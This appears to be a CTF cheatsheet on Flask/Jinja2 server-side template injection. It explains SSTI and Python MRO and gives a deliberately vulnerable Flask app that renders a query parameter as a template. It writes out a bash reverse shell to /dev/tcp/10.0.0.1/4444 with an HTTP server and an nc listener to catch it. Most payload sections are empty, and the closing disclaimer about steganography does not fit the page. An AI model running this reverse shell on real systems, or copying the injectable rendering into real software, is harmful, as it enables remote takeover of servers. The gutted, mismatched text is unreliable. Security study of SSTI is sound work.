Flask is a micro web framework written in Python.
Common Directories
1
2
3
4
5
/app.py
/main.py
/modules.py
/modules/__init__.py
/modules/admin.py
Server-Side Template Injection (SSTI)
A server side template injection is a vulnerability that occurs when a server renders user input as a template of some sort. Templates can be used when only minor details of a page need to change from circumstance to circumstance. For example, depending on the IP that accesses a site, the site may look like :
1
2
<h1>Welcome to the page!</h1>
<u>This page is being accessed from the remote address: </u>
Instead of creating a whole new page per person that accesses the site, it will simply render the remote address into the ```` variable, while reusing the rest of the HTML for each person request the server receives to that endpoint.
This can be abused, since some template engines support some fairly complex functionality, that eventually allow for developers to run commands or file contents straight from the template.
So when the power to create and render templates is given to a user, it can lead to full access to the system, as the user running the webserver.
What is ‘MRO’?
MRO (Resolution Order method) is the order in which Python is looking for methods in class hierarchy. When an object of calling method, python will look for the compliance method in the sequence determined by MRO. This MRO sequence determines the order of inheritance of the class to be sought by Python.
Example :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
class A:
def process(self):
print('A process()')
class B:
def process(self):
print('B process()')
class C(A, B):
def process(self):
print('C process()')
class D(C, B):
pass
obj = D()
obj.process()
print(D.mro())
In this example, when object D calls the process method (), Python will look for the method in the MRO sequence. The output of the print (D.Mro ()) will provide a MRO sequence for class D :
1
[<class '__main__.D'>, <class '__main__.C'>, <class '__main__.A'>, <class '__main__.B'>, <class 'object'>]
This MRO sequence shows that the process method () will be sought first in class D, then in class C, followed by A, B, and Object (basic class for all classes in Python).
By using MRO, we can understand the sequence of class inheritance and identify which classes will be used in certain situations. This is useful especially when using multiple inheritance or in the context of the construction of SSTI content with Jinja2.
1
2
3
4
5
6
7
8
9
10
11
12
13
from flask import Flask, request, render_template_string
app = Flask(__name__)
@app.route("/")
def home():
if request.args.get('c'):
return render_template_string(request.args.get('c'))
else:
return "Hi!!!"
if __name__ == "__main__":
app.run(debug=True)
Installation
- sudo apt-get install python-pip
- pip install flask –user
- python app.py
Sometimes, website may filter specific characters. If so, URL encode the payload or convert to HEX. In addition, it’s recommended to send requests using Burp Suite because web browsers automatically update the payload.
Payload
1
2
3
4
5
# Remove curly brackets
{2*3}
2*3
If success, you may be able to exploit with OS command injection.
`
`
``
``
``
``
``
``
RCE bypassing
``
waf blocks “.”:
``
waf blocks “.” and “_”:
``
Bypassing the blocks on “.”, “_”, “[]” and “|join”
` `
Reverse Shell
``
``
Filter bypass - Base64 encode
``
Alternatively, we can create a shell script to reverse shell, then execute it in the server side. For example, create a shell script named revshell in local machine.
1
2
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
Then host it and start a listener for receiving an incoming request.
1
2
3
4
5
# Local terminal 1
python3 -m http.server 8000
# Local terminal 2
nc -lvnp 4444
DISCLAIMER
1
This cheatsheet is intended to guide CTF players in their research. This cheatsheet is not representative of modern steganography/seganalysis techniques, and its content does match with the creation of an interesting challenges 😉.